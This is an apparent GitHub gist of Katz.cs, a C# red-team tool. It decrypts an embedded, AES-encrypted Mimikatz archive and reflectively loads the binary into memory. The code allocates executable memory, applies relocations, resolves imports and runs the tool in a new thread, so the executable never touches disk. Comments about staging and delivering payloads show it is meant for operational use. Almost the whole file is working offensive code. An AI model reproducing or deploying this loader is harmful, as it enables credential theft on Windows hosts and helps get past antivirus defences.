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@analyticsearch
Created August 1, 2018 08:47
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Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs
*/
namespace Delivery
{
public class Program
{
public static void Main()
{
Katz.Exec();
/* Builder Shit
//Example Extract Files and Encrypt. Ideally you would compress. But .NET 2 doesn't have really good Compression Libraries..
byte[] b = Misc.FileToByteArray(@"mimikatz_trunk.zip");
byte[] e = Misc.Encrypt(b,"password"); //You can easily decouple the key from the code here. Just for PoC
string f = System.Convert.ToBase64String(e);
File.WriteAllText(@"file.b64",f);
Console.WriteLine("Finished");
*/
}
}
public class Katz
{
public static void Exec()
{
byte[] unpacked = null;
try
{
byte[] latestMimikatz = Misc.Decrypt(Convert.FromBase64String(Package.file), "password"); //Yes, this is a bad idea.
//Use Misc Class to encrypt your own files
Stream data = new MemoryStream(latestMimikatz); //The original data
Stream unzippedEntryStream; //Unzipped data from a file in the archive
ZipArchive archive = new ZipArchive(data);
foreach (ZipArchiveEntry entry in archive.Entries)
{
if (IntPtr.Size == 8 && entry.FullName == @"x64/mimikatz.exe") //x64 Unpack And Execute
{
//x64 Unpack And Execute
Console.WriteLine(entry.FullName);
unzippedEntryStream = entry.Open(); // .Open will return a stream
unpacked = Misc.ReadFully(unzippedEntryStream);
}
else if (IntPtr.Size == 4 && entry.FullName == @"Win32/mimikatz.exe")
{
//x86 Unpack And Execute
Console.WriteLine(entry.FullName);
unzippedEntryStream = entry.Open(); // .Open will return a stream
unpacked = Misc.ReadFully(unzippedEntryStream);
}
}
}
catch (Exception ex)
{
while (ex != null)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
Console.WriteLine("Downloaded Latest");
PELoader pe = new PELoader(unpacked);
IntPtr codebase = IntPtr.Zero;
if (pe.Is32BitHeader)
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
else
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
//Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
}
//Perform Base Relocation
//Calculate Delta
IntPtr currentbase = codebase;
long delta;
if (pe.Is32BitHeader)
{
delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
}
else
{
delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
}
Console.WriteLine("Delta = {0}", delta.ToString("X4"));
//Modify Memory Based On Relocation Table
IntPtr relocationTable;
if (pe.Is32BitHeader)
{
relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
}
else
{
relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
}
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtr.Add(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtr.Add(codebase, (int)relocationEntry.VirtualAdress);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0x3:
patchAddr = IntPtr.Add(dest, fixup);
//Add Delta To Location.
int originalx86Addr = Marshal.ReadInt32(patchAddr);
Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
break;
case 0xA:
patchAddr = IntPtr.Add(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtr.Add(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtr.Add(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0) break;
}
//Resolve Imports
IntPtr z;
IntPtr oa1;
int oa2;
if (pe.Is32BitHeader)
{
z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16));
}
else
{
z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16));
}
//Get And Display Each DLL To Load
IntPtr threadStart;
IntPtr hThread;
if (pe.Is32BitHeader)
{
int j = 0;
while (true) //HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16));
IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "") { break; }
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while(true)
{
IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2));
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt32(a2, (int)funcAddy);
a2 = IntPtr.Add(a2, 4);
if (DllFuncName == "") break;
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
else
{
int j = 0;
while (true)
{
IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16));
IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "") { break; }
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2));
//Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtr.Add(a2, 8);
if (DllFuncName == "") break;
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
//Transfer Control To OEP
Console.WriteLine("Thread Complete");
//Console.ReadLine();
} //End Main
}//End Program
public class PELoader
{
public struct IMAGE_DOS_HEADER
{ // DOS .EXE header
public UInt16 e_magic; // Magic number
public UInt16 e_cblp; // Bytes on last page of file
public UInt16 e_cp; // Pages in file
public UInt16 e_crlc; // Relocations
public UInt16 e_cparhdr; // Size of header in paragraphs
public UInt16 e_minalloc; // Minimum extra paragraphs needed
public UInt16 e_maxalloc; // Maximum extra paragraphs needed
public UInt16 e_ss; // Initial (relative) SS value
public UInt16 e_sp; // Initial SP value
public UInt16 e_csum; // Checksum
public UInt16 e_ip; // Initial IP value
public UInt16 e_cs; // Initial (relative) CS value
public UInt16 e_lfarlc; // File address of relocation table
public UInt16 e_ovno; // Overlay number
public UInt16 e_res_0; // Reserved words
public UInt16 e_res_1; // Reserved words
public UInt16 e_res_2; // Reserved words
public UInt16 e_res_3; // Reserved words
public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
public UInt16 e_oeminfo; // OEM information; e_oemid specific
public UInt16 e_res2_0; // Reserved words
public UInt16 e_res2_1; // Reserved words
public UInt16 e_res2_2; // Reserved words
public UInt16 e_res2_3; // Reserved words
public UInt16 e_res2_4; // Reserved words
public UInt16 e_res2_5; // Reserved words
public UInt16 e_res2_6; // Reserved words
public UInt16 e_res2_7; // Reserved words
public UInt16 e_res2_8; // Reserved words
public UInt16 e_res2_9; // Reserved words
public UInt32 e_lfanew; // File address of new exe header
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DATA_DIRECTORY
{
public UInt32 VirtualAddress;
public UInt32 Size;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER32
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt32 BaseOfData;
public UInt32 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt32 SizeOfStackReserve;
public UInt32 SizeOfStackCommit;
public UInt32 SizeOfHeapReserve;
public UInt32 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER64
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt64 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt64 SizeOfStackReserve;
public UInt64 SizeOfStackCommit;
public UInt64 SizeOfHeapReserve;
public UInt64 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_FILE_HEADER
{
public UInt16 Machine;
public UInt16 NumberOfSections;
public UInt32 TimeDateStamp;
public UInt32 PointerToSymbolTable;
public UInt32 NumberOfSymbols;
public UInt16 SizeOfOptionalHeader;
public UInt16 Characteristics;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER
{
[FieldOffset(0)]
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public char[] Name;
[FieldOffset(8)]
public UInt32 VirtualSize;
[FieldOffset(12)]
public UInt32 VirtualAddress;
[FieldOffset(16)]
public UInt32 SizeOfRawData;
[FieldOffset(20)]
public UInt32 PointerToRawData;
[FieldOffset(24)]
public UInt32 PointerToRelocations;
[FieldOffset(28)]
public UInt32 PointerToLinenumbers;
[FieldOffset(32)]
public UInt16 NumberOfRelocations;
[FieldOffset(34)]
public UInt16 NumberOfLinenumbers;
[FieldOffset(36)]
public DataSectionFlags Characteristics;
public string Section
{
get { return new string(Name); }
}
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_BASE_RELOCATION
{
public uint VirtualAdress;
public uint SizeOfBlock;
}
[Flags]
public enum DataSectionFlags : uint
{
Stub = 0x00000000,
}
/// The DOS header
private IMAGE_DOS_HEADER dosHeader;
/// The file header
private IMAGE_FILE_HEADER fileHeader;
/// Optional 32 bit file header
private IMAGE_OPTIONAL_HEADER32 optionalHeader32;
/// Optional 64 bit file header
private IMAGE_OPTIONAL_HEADER64 optionalHeader64;
/// Image Section headers. Number of sections is in the file header.
private IMAGE_SECTION_HEADER[] imageSectionHeaders;
private byte[] rawbytes;
public PELoader(string filePath)
{
// Read in the DLL or EXE and get the timestamp
using (FileStream stream = new FileStream(filePath, System.IO.FileMode.Open, System.IO.FileAccess.Read))
{
BinaryReader reader = new BinaryReader(stream);
dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
// Add 4 bytes to the offset
stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
UInt32 ntHeadersSignature = reader.ReadUInt32();
fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
if (this.Is32BitHeader)
{
optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
}
else
{
optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
}
imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
{
imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
}
rawbytes = System.IO.File.ReadAllBytes(filePath);
}
}
public PELoader(byte[] fileBytes)
{
// Read in the DLL or EXE and get the timestamp
using (MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length))
{
BinaryReader reader = new BinaryReader(stream);
dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
// Add 4 bytes to the offset
stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
UInt32 ntHeadersSignature = reader.ReadUInt32();
fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
if (this.Is32BitHeader)
{
optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
}
else
{
optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
}
imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
{
imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
}
rawbytes = fileBytes;
}
}
public static T FromBinaryReader<T>(BinaryReader reader)
{
// Read in a byte array
byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
// Pin the managed memory while, copy it out the data, then unpin it
GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
handle.Free();
return theStructure;
}
public bool Is32BitHeader
{
get
{
UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
}
}
public IMAGE_FILE_HEADER FileHeader
{
get
{
return fileHeader;
}
}
/// Gets the optional header
public IMAGE_OPTIONAL_HEADER32 OptionalHeader32
{
get
{
return optionalHeader32;
}
}
/// Gets the optional header
public IMAGE_OPTIONAL_HEADER64 OptionalHeader64
{
get
{
return optionalHeader64;
}
}
public IMAGE_SECTION_HEADER[] ImageSectionHeaders
{
get
{
return imageSectionHeaders;
}
}
public byte[] RawBytes
{
get
{
return rawbytes;
}
}
}//End Class
unsafe class NativeDeclarations
{
public static uint MEM_COMMIT = 0x1000;
public static uint MEM_RESERVE = 0x2000;
public static uint PAGE_EXECUTE_READWRITE = 0x40;
public static uint PAGE_READWRITE = 0x04;
[StructLayout(LayoutKind.Sequential)]
public unsafe struct IMAGE_BASE_RELOCATION
{
public uint VirtualAdress;
public uint SizeOfBlock;
}
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr CreateThread(
IntPtr lpThreadAttributes,
uint dwStackSize,
IntPtr lpStartAddress,
IntPtr param,
uint dwCreationFlags,
IntPtr lpThreadId
);
[DllImport("kernel32")]
public static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[StructLayout(LayoutKind.Sequential)]
public unsafe struct IMAGE_IMPORT_DESCRIPTOR
{
public uint OriginalFirstThunk;
public uint TimeDateStamp;
public uint ForwarderChain;
public uint Name;
public uint FirstThunk;
}
}
public class Misc
{
//Change This!
private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
public static void Stage(string fileName, string Key, string outFile)
{
byte[] raw = FileToByteArray(fileName);
byte[] file = Encrypt(raw, Key);
FileStream fileStream = File.Create(outFile);
fileStream.Write(file, 0, file.Length);//Write stream to temp file
Console.WriteLine("File Ready, Now Deliver Payload");
}
public static byte[] FileToByteArray(string _FileName)
{
byte[] _Buffer = null;
System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
_Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
_FileStream.Close();
_FileStream.Dispose();
_BinaryReader.Close();
return _Buffer;
}
public static byte[] Encrypt(byte[] plain, string password)
{
MemoryStream memoryStream;
CryptoStream cryptoStream;
Rijndael rijndael = Rijndael.Create();
Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
rijndael.Key = pdb.GetBytes(32);
rijndael.IV = pdb.GetBytes(16);
memoryStream = new MemoryStream();
cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
cryptoStream.Write(plain, 0, plain.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
public static byte[] Decrypt(byte[] cipher, string password)
{
MemoryStream memoryStream;
CryptoStream cryptoStream;
Rijndael rijndael = Rijndael.Create();
Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
rijndael.Key = pdb.GetBytes(32);
rijndael.IV = pdb.GetBytes(16);
memoryStream = new MemoryStream();
cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
cryptoStream.Write(cipher, 0, cipher.Length);
cryptoStream.Close();
return memoryStream.ToArray();
}
public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
{
byte[] buffer = new byte[16 * 1024];
using (MemoryStream ms = new MemoryStream())
{
int read;
while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
{
ms.Write(buffer, 0, read);
}
return ms.ToArray();
}
}
}//End Misc Class
public class Package
{
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